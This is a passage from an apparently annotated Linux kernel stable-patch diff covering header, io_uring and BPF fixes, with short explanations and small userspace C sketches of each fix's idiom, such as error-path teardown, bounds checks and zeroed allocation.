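	printf("warning path runs with RCU watching (eqs=%d)\n", in_eqs);
	demo_warn_exit(rcu);
	return 0;
}
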
+diff --git a/include/linux/device.h b/include/linux/device.h
+index 424b55df02727..7cf24330d6814 100644
+--- a/include/linux/device.h
++++ b/include/linux/device.h
+@@ -327,6 +327,7 @@ enum device_link_state {
+ #define DL_FLAG_MANAGED			BIT(6)
+ #define DL_FLAG_SYNC_STATE_ONLY		BIT(7)
+ #define DL_FLAG_INFERRED		BIT(8)
++#define DL_FLAG_CYCLE			BIT(9)
+ 
+ /**
+  * enum dl_dev_state - Device driver presence tracking information.
+diff --git a/include/linux/fwnode.h b/include/linux/fwnode.h
+index 89b9bdfca925c..5700451b300fb 100644
+--- a/include/linux/fwnode.h
++++ b/include/linux/fwnode.h
+@@ -18,7 +18,7 @@ struct fwnode_operations;
+ struct device;
+ 
+ /*
+- * fwnode link flags
++ * fwnode flags
+  *
+  * LINKS_ADDED:	The fwnode has already be parsed to add fwnode links.
+  * NOT_DEVICE:	The fwnode will never be populated as a struct device.
+@@ -36,6 +36,7 @@ struct device;
+ #define FWNODE_FLAG_INITIALIZED			BIT(2)
+ #define FWNODE_FLAG_NEEDS_CHILD_BOUND_ON_ADD	BIT(3)
+ #define FWNODE_FLAG_BEST_EFFORT			BIT(4)
++#define FWNODE_FLAG_VISITED			BIT(5)
+ 
+ struct fwnode_handle {
+ 	struct fwnode_handle *secondary;
+@@ -46,11 +47,19 @@ struct fwnode_handle {
+ 	u8 flags;
+ };
+ 
++/*
++ * fwnode link flags
++ *
++ * CYCLE:	The fwnode link is part of a cycle. Don't defer probe.
++ */
++#define FWLINK_FLAG_CYCLE			BIT(0)
++
+ struct fwnode_link {
+ 	struct fwnode_handle *supplier;
+ 	struct list_head s_hook;
+ 	struct fwnode_handle *consumer;
+ 	struct list_head c_hook;
++	u8 flags;
+ };
+ 
+ /**
+@@ -198,7 +207,6 @@ static inline void fwnode_dev_initialized(struct fwnode_handle *fwnode,
+ 		fwnode->flags &= ~FWNODE_FLAG_INITIALIZED;
+ }
+ 
+-extern u32 fw_devlink_get_flags(void);
+ extern bool fw_devlink_is_strict(void);
+ int fwnode_link_add(struct fwnode_handle *con, struct fwnode_handle *sup);
+ void fwnode_links_purge(struct fwnode_handle *fwnode);
+diff --git a/include/linux/hid.h b/include/linux/hid.h
+index 8677ae38599e4..48563dc09e171 100644
+--- a/include/linux/hid.h
++++ b/include/linux/hid.h
+@@ -619,6 +619,7 @@ struct hid_device {							/* device report descriptor */
+ 	unsigned long status;						/* see STAT flags above */
+ 	unsigned claimed;						/* Claimed by hidinput, hiddev? */
+ 	unsigned quirks;						/* Various quirks the device can pull on us */
++	unsigned initial_quirks;					/* Initial set of quirks supplied when creating device */
+ 	bool io_started;						/* If IO has started */
+ 
+ 	struct list_head inputs;					/* The list of inputs */
+diff --git a/include/linux/ima.h b/include/linux/ima.h
+index 81708ca0ebc74..83ddee788583e 100644
+--- a/include/linux/ima.h
++++ b/include/linux/ima.h
+@@ -21,7 +21,8 @@ extern int ima_file_check(struct file *file, int mask);
+ extern void ima_post_create_tmpfile(struct user_namespace *mnt_userns,
+ 				    struct inode *inode);
+ extern void ima_file_free(struct file *file);
+-extern int ima_file_mmap(struct file *file, unsigned long prot);
++extern int ima_file_mmap(struct file *file, unsigned long reqprot,
++			 unsigned long prot, unsigned long flags);
+ extern int ima_file_mprotect(struct vm_area_struct *vma, unsigned long prot);
+ extern int ima_load_data(enum kernel_load_data_id id, bool contents);
+ extern int ima_post_load_data(char *buf, loff_t size,
+@@ -76,7 +77,8 @@ static inline void ima_file_free(struct file *file)
+ 	return;
+ }
+ 
+-static inline int ima_file_mmap(struct file *file, unsigned long prot)
++static inline int ima_file_mmap(struct file *file, unsigned long reqprot,
++				unsigned long prot, unsigned long flags)
+ {
+ 	return 0;
+ }
+diff --git a/include/linux/kernel_stat.h b/include/linux/kernel_stat.h
+index ddb5a358fd829..90e2fdc17d79f 100644
+--- a/include/linux/kernel_stat.h
++++ b/include/linux/kernel_stat.h
+@@ -75,7 +75,7 @@ extern unsigned int kstat_irqs_usr(unsigned int irq);
+ /*
+  * Number of interrupts per cpu, since bootup
+  */
+-static inline unsigned int kstat_cpu_irqs_sum(unsigned int cpu)
++static inline unsigned long kstat_cpu_irqs_sum(unsigned int cpu)
+ {
+ 	return kstat_cpu(cpu).irqs_sum;
+ }
+diff --git a/include/linux/kobject.h b/include/linux/kobject.h
+index 57fb972fea05b..592f9785b058a 100644
+--- a/include/linux/kobject.h
++++ b/include/linux/kobject.h
+@@ -115,7 +115,7 @@ extern void kobject_put(struct kobject *kobj);
+ extern const void *kobject_namespace(struct kobject *kobj);
+ extern void kobject_get_ownership(struct kobject *kobj,
+ 				  kuid_t *uid, kgid_t *gid);
+-extern char *kobject_get_path(struct kobject *kobj, gfp_t flag);
++extern char *kobject_get_path(const struct kobject *kobj, gfp_t flag);
+ 
+ struct kobj_type {
+ 	void (*release)(struct kobject *kobj);
+diff --git a/include/linux/kprobes.h b/include/linux/kprobes.h
+index a0b92be98984e..85a64cb95d755 100644
+--- a/include/linux/kprobes.h
++++ b/include/linux/kprobes.h
+@@ -378,6 +378,8 @@ extern void opt_pre_handler(struct kprobe *p, struct pt_regs *regs);
+ DEFINE_INSN_CACHE_OPS(optinsn);
+ 
+ extern void wait_for_kprobe_optimizer(void);
++bool optprobe_queued_unopt(struct optimized_kprobe *op);
++bool kprobe_disarmed(struct kprobe *p);
+ #else /* !CONFIG_OPTPROBES */
+ static inline void wait_for_kprobe_optimizer(void) { }
+ #endif /* CONFIG_OPTPROBES */
+diff --git a/include/linux/libnvdimm.h b/include/linux/libnvdimm.h
+index c74acfa1a3fe9..4e5f578025c4c 100644
+--- a/include/linux/libnvdimm.h
++++ b/include/linux/libnvdimm.h
+@@ -36,6 +36,9 @@ enum {
+ 	/* dimm supports namespace labels */
+ 	NDD_LABELING = 6,
+ 
++	/* dimm provider wants synchronous registration by __nvdimm_create() */
++	NDD_REGISTER_SYNC = 8,
++
+ 	/* need to set a limit somewhere, but yes, this is likely overkill */
+ 	ND_IOCTL_MAX_BUFLEN = SZ_4M,
+ 	ND_CMD_MAX_ELEM = 5,
+diff --git a/include/linux/mlx4/qp.h b/include/linux/mlx4/qp.h
+index 9db93e487496a..b6b626157b03a 100644
+--- a/include/linux/mlx4/qp.h
++++ b/include/linux/mlx4/qp.h
+@@ -446,6 +446,7 @@ enum {
+ 
+ struct mlx4_wqe_inline_seg {
+ 	__be32			byte_count;
++	__u8			data[];
+ };
+ 
+ enum mlx4_update_qp_attr {
+diff --git a/include/linux/nfs_ssc.h b/include/linux/nfs_ssc.h
+index 75843c00f326a..22265b1ff0800 100644
+--- a/include/linux/nfs_ssc.h
++++ b/include/linux/nfs_ssc.h
+@@ -53,6 +53,7 @@ static inline void nfs42_ssc_close(struct file *filep)
+ 	if (nfs_ssc_client_tbl.ssc_nfs4_ops)
+ 		(*nfs_ssc_client_tbl.ssc_nfs4_ops->sco_close)(filep);
+ }
++#endif
+ 
+ struct nfsd4_ssc_umount_item {
+ 	struct list_head nsui_list;
+@@ -66,7 +67,6 @@ struct nfsd4_ssc_umount_item {
+ 	struct vfsmount *nsui_vfsmount;
+ 	char nsui_ipaddr[RPC_MAX_ADDRBUFLEN + 1];
+ };
+-#endif
+ 
+ /*
+  * NFS_FS
+diff --git a/include/linux/poison.h b/include/linux/poison.h
+index 2d3249eb0e62d..0e8a1f2ceb2f1 100644
+--- a/include/linux/poison.h
++++ b/include/linux/poison.h
+@@ -84,4 +84,7 @@
+ /********** kernel/bpf/ **********/
+ #define BPF_PTR_POISON ((void *)(0xeB9FUL + POISON_POINTER_DELTA))
+ 
++/********** VFS **********/
++#define VFS_PTR_POISON ((void *)(0xF5 + POISON_POINTER_DELTA))
++
+ #endif
+diff --git a/include/linux/rcupdate.h b/include/linux/rcupdate.h
+index 08605ce7379d7..e9e61cd27ef63 100644
+--- a/include/linux/rcupdate.h
++++ b/include/linux/rcupdate.h
+@@ -229,6 +229,7 @@ void synchronize_rcu_tasks_rude(void);
+ 
+ #define rcu_note_voluntary_context_switch(t) rcu_tasks_qs(t, false)
+ void exit_tasks_rcu_start(void);
++void exit_tasks_rcu_stop(void);
+ void exit_tasks_rcu_finish(void);
+ #else /* #ifdef CONFIG_TASKS_RCU_GENERIC */
+ #define rcu_tasks_classic_qs(t, preempt) do { } while (0)
+@@ -237,6 +238,7 @@ void exit_tasks_rcu_finish(void);
+ #define call_rcu_tasks call_rcu
+ #define synchronize_rcu_tasks synchronize_rcu
+ static inline void exit_tasks_rcu_start(void) { }
++static inline void exit_tasks_rcu_stop(void) { }
+ static inline void exit_tasks_rcu_finish(void) { }
+ #endif /* #else #ifdef CONFIG_TASKS_RCU_GENERIC */
+ 
+@@ -348,11 +350,18 @@ static inline int rcu_read_lock_any_held(void)
+  * RCU_LOCKDEP_WARN - emit lockdep splat if specified condition is met
+  * @c: condition to check
+  * @s: informative message
++ *
++ * This checks debug_lockdep_rcu_enabled() before checking (c) to
++ * prevent early boot splats due to lockdep not yet being initialized,
++ * and rechecks it after checking (c) to prevent false-positive splats
++ * due to races with lockdep being disabled.  See commit 3066820034b5dd
++ * ("rcu: Reject RCU_LOCKDEP_WARN() false positives") for more detail.
+  */
+ #define RCU_LOCKDEP_WARN(c, s)						\
+ 	do {								\
+ 		static bool __section(".data.unlikely") __warned;	\
+-		if ((c) && debug_lockdep_rcu_enabled() && !__warned) {	\
++		if (debug_lockdep_rcu_enabled() && (c) &&		\
++		    debug_lockdep_rcu_enabled() && !__warned) {		\
+ 			__warned = true;				\
+ 			lockdep_rcu_suspicious(__FILE__, __LINE__, s);	\
+ 		}							\
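
The macro now evaluates debug_lockdep_rcu_enabled() both before and after the condition, so a report that races with lockdep being disabled is suppressed. A sketch of that check/recheck idiom against a hypothetical checker_enabled flag:

#include <stdbool.h>
#include <stdio.h>

static volatile bool checker_enabled = true;

/* Evaluate cond only while the checker is enabled, and re-check afterwards
 * so a concurrent disable suppresses the report -- the same shape as the
 * reworked RCU_LOCKDEP_WARN(). */
#define DEMO_WARN(cond, msg)						\
	do {								\
		static bool warned;					\
		if (checker_enabled && (cond) &&			\
		    checker_enabled && !warned) {			\
			warned = true;					\
			fprintf(stderr, "splat: %s\n", (msg));		\
		}							\
	} while (0)

int main(void)
{
	DEMO_WARN(1 == 1, "condition met while checker enabled");
	checker_enabled = false;
	DEMO_WARN(1 == 1, "never printed: checker disabled");
	return 0;
}
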
+diff --git a/include/linux/rmap.h b/include/linux/rmap.h
+index bd3504d11b155..2bdba700bc3e3 100644
+--- a/include/linux/rmap.h
++++ b/include/linux/rmap.h
+@@ -94,7 +94,7 @@ enum ttu_flags {
+ 	TTU_SPLIT_HUGE_PMD	= 0x4,	/* split huge PMD if any */
+ 	TTU_IGNORE_MLOCK	= 0x8,	/* ignore mlock */
+ 	TTU_SYNC		= 0x10,	/* avoid racy checks with PVMW_SYNC */
+-	TTU_IGNORE_HWPOISON	= 0x20,	/* corrupted page is recoverable */
++	TTU_HWPOISON		= 0x20,	/* do convert pte to hwpoison entry */
+ 	TTU_BATCH_FLUSH		= 0x40,	/* Batch TLB flushes where possible
+ 					 * and caller guarantees they will
+ 					 * do a final flush if necessary */
+diff --git a/include/linux/sbitmap.h b/include/linux/sbitmap.h
+index 4d2d5205ab586..d662cf136021d 100644
+--- a/include/linux/sbitmap.h
++++ b/include/linux/sbitmap.h
+@@ -86,11 +86,6 @@ struct sbitmap {
+  * struct sbq_wait_state - Wait queue in a &struct sbitmap_queue.
+  */
+ struct sbq_wait_state {
+-	/**
+-	 * @wait_cnt: Number of frees remaining before we wake up.
+-	 */
+-	atomic_t wait_cnt;
+-
+ 	/**
+ 	 * @wait: Wait queue.
+ 	 */
+@@ -138,6 +133,17 @@ struct sbitmap_queue {
+ 	 * sbitmap_queue_get_shallow()
+ 	 */
+ 	unsigned int min_shallow_depth;
++
++	/**
++	 * @completion_cnt: Number of bits cleared passed to the
++	 * wakeup function.
++	 */
++	atomic_t completion_cnt;
++
++	/**
++	 * @wakeup_cnt: Number of thread wake ups issued.
++	 */
++	atomic_t wakeup_cnt;
+ };
+ 
+ /**
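
The sbitmap change replaces the per-waitqueue wait_cnt with queue-wide completion_cnt/wakeup_cnt counters. A sketch of batched wakeups driven by two global atomic counters (C11 atomics; WAKE_BATCH and on_bit_cleared() are illustrative):

#include <stdatomic.h>
#include <stdio.h>

#define WAKE_BATCH 8

static atomic_int completion_cnt;
static atomic_int wakeup_cnt;

/* Issue one wakeup per WAKE_BATCH completions, tracked globally instead
 * of per wait queue -- the direction the sbitmap change moves in. */
static void on_bit_cleared(void)
{
	int done = atomic_fetch_add(&completion_cnt, 1) + 1;
	int woken = atomic_load(&wakeup_cnt);

	if (done - woken * WAKE_BATCH >= WAKE_BATCH) {
		atomic_fetch_add(&wakeup_cnt, 1);
		printf("wake one waiter (completions=%d)\n", done);
	}
}

int main(void)
{
	for (int i = 0; i < 20; i++)
		on_bit_cleared();
	return 0;
}
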
+diff --git a/include/linux/transport_class.h b/include/linux/transport_class.h
+index 63076fb835e34..2efc271a96fa6 100644
+--- a/include/linux/transport_class.h
++++ b/include/linux/transport_class.h
+@@ -70,8 +70,14 @@ void transport_destroy_device(struct device *);
+ static inline int
+ transport_register_device(struct device *dev)
+ {
++	int ret;
++
+ 	transport_setup_device(dev);
+-	return transport_add_device(dev);
++	ret = transport_add_device(dev);
++	if (ret)
++		transport_destroy_device(dev);
++
++	return ret;
+ }
+ 
+ static inline void
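
transport_register_device() now tears down what transport_setup_device() built when transport_add_device() fails. The same setup/add/destroy-on-error shape in a self-contained sketch (all demo_* helpers are hypothetical):

#include <stdio.h>

static void demo_setup(const char *name)   { printf("setup %s\n", name); }
static int  demo_add(const char *name)     { printf("add %s\n", name); return -1; }
static void demo_destroy(const char *name) { printf("destroy %s\n", name); }

/* On failure of the "add" step, undo the "setup" step so the caller is
 * not left holding a half-initialized object -- the fix the hunk makes. */
static int demo_register(const char *name)
{
	int ret;

	demo_setup(name);
	ret = demo_add(name);
	if (ret)
		demo_destroy(name);
	return ret;
}

int main(void)
{
	return demo_register("dev0") ? 1 : 0;
}
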
+diff --git a/include/linux/uaccess.h b/include/linux/uaccess.h
+index afb18f198843b..ab9728138ad67 100644
+--- a/include/linux/uaccess.h
++++ b/include/linux/uaccess.h
+@@ -329,6 +329,10 @@ copy_struct_from_user(void *dst, size_t ksize, const void __user *src,
+ 	size_t size = min(ksize, usize);
+ 	size_t rest = max(ksize, usize) - size;
+ 
++	/* Double check if ksize is larger than a known object size. */
++	if (WARN_ON_ONCE(ksize > __builtin_object_size(dst, 1)))
++		return -E2BIG;
++
+ 	/* Deal with trailing bytes. */
+ 	if (usize < ksize) {
+ 		memset(dst + size, 0, rest);
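
The added WARN_ON_ONCE rejects a ksize larger than what the compiler can prove about the destination, via __builtin_object_size(). A userspace sketch of the same guard (GCC/Clang builtin; build with -O1 or higher so the object size resolves, otherwise the builtin may report "unknown"):

#include <stdio.h>
#include <string.h>

struct args { int a, b; };

/* Reject a caller-supplied size larger than what the compiler can prove
 * about the destination object (mirrors the added WARN_ON_ONCE check). */
#define size_ok(dst, ksize) \
	((ksize) <= __builtin_object_size(dst, 1))

int main(void)
{
	struct args a;

	if (size_ok(&a, sizeof(a)))
		memset(&a, 0, sizeof(a));		/* fine */
	printf("oversized request allowed? %d\n",
	       size_ok(&a, sizeof(a) + 8));		/* 0 with -O1+ */
	return 0;
}
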
+diff --git a/include/linux/wait.h b/include/linux/wait.h
+index 7f5a51aae0a73..a0307b516b099 100644
+--- a/include/linux/wait.h
++++ b/include/linux/wait.h
+@@ -209,7 +209,7 @@ __remove_wait_queue(struct wait_queue_head *wq_head, struct wait_queue_entry *wq
+ 	list_del(&wq_entry->entry);
+ }
+ 
+-void __wake_up(struct wait_queue_head *wq_head, unsigned int mode, int nr, void *key);
++int __wake_up(struct wait_queue_head *wq_head, unsigned int mode, int nr, void *key);
+ void __wake_up_locked_key(struct wait_queue_head *wq_head, unsigned int mode, void *key);
+ void __wake_up_locked_key_bookmark(struct wait_queue_head *wq_head,
+ 		unsigned int mode, void *key, wait_queue_entry_t *bookmark);
+diff --git a/include/net/sock.h b/include/net/sock.h
+index 1f868764575c3..832a4a51de4d9 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -1952,7 +1952,12 @@ void sk_common_release(struct sock *sk);
+  *	Default socket callbacks and setup code
+  */
+ 
+-/* Initialise core socket variables */
++/* Initialise core socket variables using an explicit uid. */
++void sock_init_data_uid(struct socket *sock, struct sock *sk, kuid_t uid);
++
++/* Initialise core socket variables.
++ * Assumes struct socket *sock is embedded in a struct socket_alloc.
++ */
+ void sock_init_data(struct socket *sock, struct sock *sk);
+ 
+ /*
+diff --git a/include/sound/hda_codec.h b/include/sound/hda_codec.h
+index eba23daf2c290..bbb7805e85d8e 100644
+--- a/include/sound/hda_codec.h
++++ b/include/sound/hda_codec.h
+@@ -259,6 +259,7 @@ struct hda_codec {
+ 	unsigned int relaxed_resume:1;	/* don't resume forcibly for jack */
+ 	unsigned int forced_resume:1; /* forced resume for jack */
+ 	unsigned int no_stream_clean_at_suspend:1; /* do not clean streams at suspend */
++	unsigned int ctl_dev_id:1; /* old control element id build behaviour */
+ 
+ #ifdef CONFIG_PM
+ 	unsigned long power_on_acct;
+diff --git a/include/sound/soc-dapm.h b/include/sound/soc-dapm.h
+index ebb8e7a7fc29e..9f2b1e6d858f7 100644
+--- a/include/sound/soc-dapm.h
++++ b/include/sound/soc-dapm.h
+@@ -16,6 +16,7 @@
+ #include <sound/asoc.h>
+ 
+ struct device;
++struct snd_pcm_substream;
+ struct snd_soc_pcm_runtime;
+ struct soc_enum;
+ 
+diff --git a/include/trace/events/devlink.h b/include/trace/events/devlink.h
+index 24969184c5348..77ff7cfc6049a 100644
+--- a/include/trace/events/devlink.h
++++ b/include/trace/events/devlink.h
+@@ -88,7 +88,7 @@ TRACE_EVENT(devlink_health_report,
+ 		__string(bus_name, devlink_to_dev(devlink)->bus->name)
+ 		__string(dev_name, dev_name(devlink_to_dev(devlink)))
+ 		__string(driver_name, devlink_to_dev(devlink)->driver->name)
+-		__string(reporter_name, msg)
++		__string(reporter_name, reporter_name)
+ 		__string(msg, msg)
+ 	),
+ 
+diff --git a/include/uapi/linux/io_uring.h b/include/uapi/linux/io_uring.h
+index 9d4c4078e8d00..9eff86acdfec4 100644
+--- a/include/uapi/linux/io_uring.h
++++ b/include/uapi/linux/io_uring.h
+@@ -617,7 +617,7 @@ struct io_uring_buf_ring {
+ 			__u16	resv3;
+ 			__u16	tail;
+ 		};
+-		struct io_uring_buf	bufs[0];
++		__DECLARE_FLEX_ARRAY(struct io_uring_buf, bufs);
+ 	};
+ };
+ 
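
__DECLARE_FLEX_ARRAY() exists because a flexible array member may not sit directly in a union; the helper wraps it in a struct padded by an empty struct. A GNU C sketch of roughly what the expansion looks like (struct buf and buf_ring are simplified stand-ins for the io_uring UAPI types, not the real macro):

#include <stdio.h>
#include <stdlib.h>

struct buf { unsigned long addr; unsigned len; };

struct buf_ring {
	union {
		struct {
			unsigned short tail;
		};
		struct {
			struct { } __empty_bufs;	/* GNU extension */
			struct buf bufs[];
		};
	};
};

int main(void)
{
	struct buf_ring *br = malloc(sizeof(*br) + 4 * sizeof(struct buf));

	br->tail = 0;
	br->bufs[0].len = 4096;		/* bufs[] overlays the ring header */
	printf("first buf len %u\n", br->bufs[0].len);
	free(br);
	return 0;
}
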
+diff --git a/include/uapi/linux/vfio.h b/include/uapi/linux/vfio.h
+index d7d8e0922376c..4e8d3440f0470 100644
+--- a/include/uapi/linux/vfio.h
++++ b/include/uapi/linux/vfio.h
+@@ -49,7 +49,11 @@
+ /* Supports VFIO_DMA_UNMAP_FLAG_ALL */
+ #define VFIO_UNMAP_ALL			9
+ 
+-/* Supports the vaddr flag for DMA map and unmap */
++/*
++ * Supports the vaddr flag for DMA map and unmap.  Not supported for mediated
++ * devices, so this capability is subject to change as groups are added or
++ * removed.
++ */
+ #define VFIO_UPDATE_VADDR		10
+ 
+ /*
+@@ -1215,8 +1219,7 @@ struct vfio_iommu_type1_info_dma_avail {
+  * Map process virtual addresses to IO virtual addresses using the
+  * provided struct vfio_dma_map. Caller sets argsz. READ &/ WRITE required.
+  *
+- * If flags & VFIO_DMA_MAP_FLAG_VADDR, update the base vaddr for iova, and
+- * unblock translation of host virtual addresses in the iova range.  The vaddr
++ * If flags & VFIO_DMA_MAP_FLAG_VADDR, update the base vaddr for iova. The vaddr
+  * must have previously been invalidated with VFIO_DMA_UNMAP_FLAG_VADDR.  To
+  * maintain memory consistency within the user application, the updated vaddr
+  * must address the same memory object as originally mapped.  Failure to do so
+@@ -1267,9 +1270,9 @@ struct vfio_bitmap {
+  * must be 0.  This cannot be combined with the get-dirty-bitmap flag.
+  *
+  * If flags & VFIO_DMA_UNMAP_FLAG_VADDR, do not unmap, but invalidate host
+- * virtual addresses in the iova range.  Tasks that attempt to translate an
+- * iova's vaddr will block.  DMA to already-mapped pages continues.  This
+- * cannot be combined with the get-dirty-bitmap flag.
++ * virtual addresses in the iova range.  DMA to already-mapped pages continues.
++ * Groups may not be added to the container while any addresses are invalid.
++ * This cannot be combined with the get-dirty-bitmap flag.
+  */
+ struct vfio_iommu_type1_dma_unmap {
+ 	__u32	argsz;
+diff --git a/include/ufs/ufshcd.h b/include/ufs/ufshcd.h
+index 2bb89290da63c..b54f22840dabf 100644
+--- a/include/ufs/ufshcd.h
++++ b/include/ufs/ufshcd.h
+@@ -566,9 +566,9 @@ enum ufshcd_quirks {
+ 	UFSHCD_QUIRK_SKIP_DEF_UNIPRO_TIMEOUT_SETTING = 1 << 13,
+ 
+ 	/*
+-	 * This quirk allows only sg entries aligned with page size.
++	 * Align DMA SG entries on a 4 KiB boundary.
+ 	 */
+-	UFSHCD_QUIRK_ALIGN_SG_WITH_PAGE_SIZE		= 1 << 14,
++	UFSHCD_QUIRK_4KB_DMA_ALIGNMENT			= 1 << 14,
+ 
+ 	/*
+ 	 * This quirk needs to be enabled if the host controller does not
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index 862e05e6691de..ce4969d3e20de 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -1030,10 +1030,16 @@ static unsigned int handle_tw_list(struct llist_node *node,
+ 			/* if not contended, grab and improve batching */
+ 			*locked = mutex_trylock(&(*ctx)->uring_lock);
+ 			percpu_ref_get(&(*ctx)->refs);
+-		}
++		} else if (!*locked)
++			*locked = mutex_trylock(&(*ctx)->uring_lock);
+ 		req->io_task_work.func(req, locked);
+ 		node = next;
+ 		count++;
++		if (unlikely(need_resched())) {
++			ctx_flush_and_put(*ctx, locked);
++			*ctx = NULL;
++			cond_resched();
++		}
+ 	}
+ 
+ 	return count;
+@@ -1591,7 +1597,7 @@ int io_req_prep_async(struct io_kiocb *req)
+ 	const struct io_op_def *def = &io_op_defs[req->opcode];
+ 
+ 	/* assign early for deferred execution for non-fixed file */
+-	if (def->needs_file && !(req->flags & REQ_F_FIXED_FILE))
++	if (def->needs_file && !(req->flags & REQ_F_FIXED_FILE) && !req->file)
+ 		req->file = io_file_get_normal(req, req->cqe.fd);
+ 	if (!def->prep_async)
+ 		return 0;
+@@ -2653,7 +2659,7 @@ static __poll_t io_uring_poll(struct file *file, poll_table *wait)
+ 	 * pushes them to do the flush.

+ 	 */
+ 
+-	if (io_cqring_events(ctx) || io_has_work(ctx))
++	if (__io_cqring_events_user(ctx) || io_has_work(ctx))
+ 		mask |= EPOLLIN | EPOLLRDNORM;
+ 
+ 	return mask;
+@@ -2912,6 +2918,7 @@ static __cold bool io_uring_try_cancel_requests(struct io_ring_ctx *ctx,
+ 		while (!wq_list_empty(&ctx->iopoll_list)) {
+ 			io_iopoll_try_reap_events(ctx);
+ 			ret = true;
++			cond_resched();
+ 		}
+ 	}
+ 
+diff --git a/io_uring/io_uring.h b/io_uring/io_uring.h
+index 90b675c65b840..019600570ee49 100644
+--- a/io_uring/io_uring.h
++++ b/io_uring/io_uring.h
+@@ -3,6 +3,7 @@
+ 
+ #include <linux/errno.h>
+ #include <linux/lockdep.h>
++#include <linux/resume_user_mode.h>
+ #include <linux/io_uring_types.h>
+ #include <uapi/linux/eventpoll.h>
+ #include "io-wq.h"
+@@ -255,6 +256,15 @@ static inline int io_run_task_work(void)
+ 	 */
+ 	if (test_thread_flag(TIF_NOTIFY_SIGNAL))
+ 		clear_notify_signal();
++	/*
++	 * PF_IO_WORKER never returns to userspace, so check here if we have
++	 * notify work that needs processing.
++	 */
++	if (current->flags & PF_IO_WORKER &&
++	    test_thread_flag(TIF_NOTIFY_RESUME)) {
++		__set_current_state(TASK_RUNNING);
++		resume_user_mode_work(NULL);
++	}
+ 	if (task_work_pending(current)) {
+ 		__set_current_state(TASK_RUNNING);
+ 		task_work_run();
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 520a73b5a4483..55d822beaf084 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -553,7 +553,7 @@ int io_recvmsg_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ 	sr->flags = READ_ONCE(sqe->ioprio);
+ 	if (sr->flags & ~(RECVMSG_FLAGS))
+ 		return -EINVAL;
+-	sr->msg_flags = READ_ONCE(sqe->msg_flags) | MSG_NOSIGNAL;
++	sr->msg_flags = READ_ONCE(sqe->msg_flags);
+ 	if (sr->msg_flags & MSG_DONTWAIT)
+ 		req->flags |= REQ_F_NOWAIT;
+ 	if (sr->msg_flags & MSG_ERRQUEUE)
+diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
+index 55d4ab96fb925..185d5dfb7d569 100644
+--- a/io_uring/rsrc.c
++++ b/io_uring/rsrc.c
+@@ -1147,14 +1147,17 @@ struct page **io_pin_pages(unsigned long ubuf, unsigned long len, int *npages)
+ 	pret = pin_user_pages(ubuf, nr_pages, FOLL_WRITE | FOLL_LONGTERM,
+ 			      pages, vmas);
+ 	if (pret == nr_pages) {
++		struct file *file = vmas[0]->vm_file;
++
+ 		/* don't support file backed memory */
+ 		for (i = 0; i < nr_pages; i++) {
+-			struct vm_area_struct *vma = vmas[i];
+-
+-			if (vma_is_shmem(vma))
++			if (vmas[i]->vm_file != file) {
++				ret = -EINVAL;
++				break;
++			}
++			if (!file)
+ 				continue;
+-			if (vma->vm_file &&
+-			    !is_file_hugepages(vma->vm_file)) {
++			if (!vma_is_shmem(vmas[i]) && !is_file_hugepages(file)) {
+ 				ret = -EOPNOTSUPP;
+ 				break;
+ 			}
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index a7c2f0c3fc19c..7fcbe5d002070 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -5131,6 +5131,7 @@ btf_get_prog_ctx_type(struct bpf_verifier_log *log, const struct btf *btf,
+ 	if (!ctx_struct)
+ 		/* should not happen */
+ 		return NULL;
++again:
+ 	ctx_tname = btf_name_by_offset(btf_vmlinux, ctx_struct->name_off);
+ 	if (!ctx_tname) {
+ 		/* should not happen */
+@@ -5144,8 +5145,16 @@ btf_get_prog_ctx_type(struct bpf_verifier_log *log, const struct btf *btf,
+ 	 * int socket_filter_bpf_prog(struct __sk_buff *skb)
+ 	 * { // no fields of skb are ever used }
+ 	 */
+-	if (strcmp(ctx_tname, tname))
+-		return NULL;
++	if (strcmp(ctx_tname, tname)) {
++		/* bpf_user_pt_regs_t is a typedef, so resolve it to
++		 * underlying struct and check name again
++		 */
++		if (!btf_type_is_modifier(ctx_struct))
++			return NULL;
++		while (btf_type_is_modifier(ctx_struct))
++			ctx_struct = btf_type_by_id(btf_vmlinux, ctx_struct->type);
++		goto again;
++	}
+ 	return ctx_type;
+ }
+ 
+diff --git a/kernel/bpf/hashtab.c b/kernel/bpf/hashtab.c
+index c4811984fafa4..4a3d0a7447026 100644
+--- a/kernel/bpf/hashtab.c
++++ b/kernel/bpf/hashtab.c
+@@ -1010,8 +1010,6 @@ static struct htab_elem *alloc_htab_elem(struct bpf_htab *htab, void *key,
+ 			l_new = ERR_PTR(-ENOMEM);
+ 			goto dec_count;
+ 		}
+-		check_and_init_map_value(&htab->map,
+-					 l_new->key + round_up(key_size, 8));
+ 	}
+ 
+ 	memcpy(l_new->key, key, key_size);
+@@ -1603,6 +1601,7 @@ static int __htab_map_lookup_and_delete_elem(struct bpf_map *map, void *key,
+ 			else
+ 				copy_map_value(map, value, l->key +
+ 					       roundup_key_size);
++			/* Zeroing special fields in the temp buffer */
+ 			check_and_init_map_value(map, value);
+ 		}
+ 
+@@ -1803,6 +1802,7 @@ again_nocopy:
+ 						      true);
+ 			else
+ 				copy_map_value(map, dst_val, value);
++			/* Zeroing special fields in the temp buffer */
+ 			check_and_init_map_value(map, dst_val);
+ 		}
+ 		if (do_delete) {
+diff --git a/kernel/bpf/memalloc.c b/kernel/bpf/memalloc.c
+index 6187c28d266f0..ace303a220ae8 100644
+--- a/kernel/bpf/memalloc.c
++++ b/kernel/bpf/memalloc.c
+@@ -143,7 +143,7 @@ static void *__alloc(struct bpf_mem_cache *c, int node)
+ 		return obj;
+ 	}
+ 
+-	return kmalloc_node(c->unit_size, flags, node);
++	return kmalloc_node(c->unit_size, flags | __GFP_ZERO, node);
+ }
+ 
+ static struct mem_cgroup *get_memcg(const struct bpf_mem_cache *c)
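
With __GFP_ZERO applied at allocation time, the hashtab code above no longer has to re-initialize special fields of a freshly allocated element that may already be visible to readers. The userspace analogue is preferring calloc() over malloc()-then-initialize:

#include <stdio.h>
#include <stdlib.h>

struct elem { long lock_placeholder; long payload; };

/* Zero memory once at allocation time (calloc / __GFP_ZERO) instead of
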